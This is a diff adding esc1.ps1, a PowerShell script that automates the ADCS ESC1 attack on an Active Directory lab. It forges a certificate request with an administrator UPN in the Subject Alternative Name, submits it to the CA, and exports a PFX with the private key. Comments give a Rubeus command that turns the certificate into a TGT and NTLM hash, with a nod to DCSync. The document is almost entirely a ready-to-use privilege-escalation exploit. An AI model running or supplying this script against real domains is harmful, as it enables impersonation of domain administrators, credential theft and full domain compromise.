beerandgin · August 29, 2023 14:58 · Feb 22, 2023
diff --git a/esc1.ps1 b/esc1.ps1
@@ -0,0 +1,96 @@
+#Thank you @NotMedic for troubleshooting/validating stuff!
+
+$password = Read-Host -Prompt "Enter Password"
+#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
+
+$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. 
+$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
+$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
+$CASERVER = "alexlab-dc01-ca" #CA name.
+$CA = $CAFQDN + "\" + $CASERVER
+$CERTFILE = "C:\Users\lowpriv\Desktop\cert.pfx" #FULL PATH TO WHERE YOU WANT PFX TO BE GENERATED.
+$TEMPLATE = "Wifi" #Vulnerable template to target. USE COMMON NAME *NOT* FRIENDLY NAME!!!
+$domain = "alexlab.local" #domain
+$target = "administrator" #Account username you're trying to impersonate
+
+write-host "Variables set. Continue to create .inf"  -foregroundcolor green
+
+write-host "Generating Certificate INF File..."
+$certinf = @"
+;---------------CertificateRequestTemplate.inf--------------
+[NewRequest]                                                 
+Subject="CN=$domain\$target"                                       
+Exportable=TRUE                                             
+KeySpec=1                                                    
+KeyUsage=0xf0
+[Extensions]
+2.5.29.17 = "{text}" ; SAN - Subject Alternative Name
+_continue_ = "upn=$target@$domain&"                                                                                         
+[RequestAttributes]
+CertificateTemplate=$TEMPLATE
+"@
+
+
+#Uncomment the below INF if you want to request a cert for yourself and get your own NTLM hash.
+#$certinf = @"
+#;---------------CertificateRequestTemplate.inf--------------
+#[NewRequest]                                                 
+#Subject="CN=$server"                                       
+#Exportable=TRUE                                             
+#KeySpec=1                                                    
+#KeyUsage=0xf0                                                                                         
+#[RequestAttributes]
+#CertificateTemplate=$TEMPLATE
+#"@
+
+$certinf > "$CERTPATH$server.inf"
+
+
+write-host ".inf created. Continue to create .req file"  -foregroundcolor green
+
+CertReq.exe -new "$CERTPATH$server.inf" "$CERTPATH$server.req"
+
+write-host ".req created. Checking to see of files exist"  -foregroundcolor green
+
+$testinf = Test-Path "$CERTPATH$server.inf"
+$testreq = Test-Path "$CERTPATH$server.req"
+
+if ($testinf -eq $true){
+write-host "$CERTPATH$server.inf successfully generated." -foregroundcolor green
+}
+else {
+write-host "$CERTPATH$server.inf could not be found. Check for errors." -ForegroundColor Red
+break
+}
+if ($testreq -eq $true){
+write-host "$CERTPATH$server.req successfully generated." -foregroundcolor green
+}
+else {
+write-host "$CERTPATH$server.req could not be found. Check for errors." -ForegroundColor Red
+break
+}
+
+write-host "Submitting new Certificate for $server"
+
+CertReq -Submit -config "$CA" "$CERTPATH$server.req" "$CERTPATH$server.cer"
+
+write-host "Importing .cer"
+
+certreq -accept "$CERTPATH$server.cer" -user
+write-host "All OK. Continue"  -foregroundcolor green
+
+
+#Exporting certificate with Private Key
+write-host "Exporting PFX with private key"
+
+$Thumbprint = gci Cert:\CurrentUser\My | Select-Object -Property Thumbprint -Last 1
+
+certutil  -user -p $password -exportpfx My $Thumbprint.Thumbprint $CERTFILE "nochain"
+
+#Cleaning
+#pfft who cleans up after they're done
+#Move-Item -Path "$CERTPATH*cer","$CERTPATH*inf","$CERTPATH*req" -Destination "C:\Users\lowpriv\Desktop\Cert"
+
+
+#Rubeus.exe asktgt /getcredentials /password:"password_you_set" /user:user_you_impersonating /certificate:yourcert.pfx  /domain:alexlab.local /dc:dc01 /show
+#This will use PKINIT to build a TGT + retrieve NTLM hash of user you're targeting. Enjoy DCSYNC :)
No results found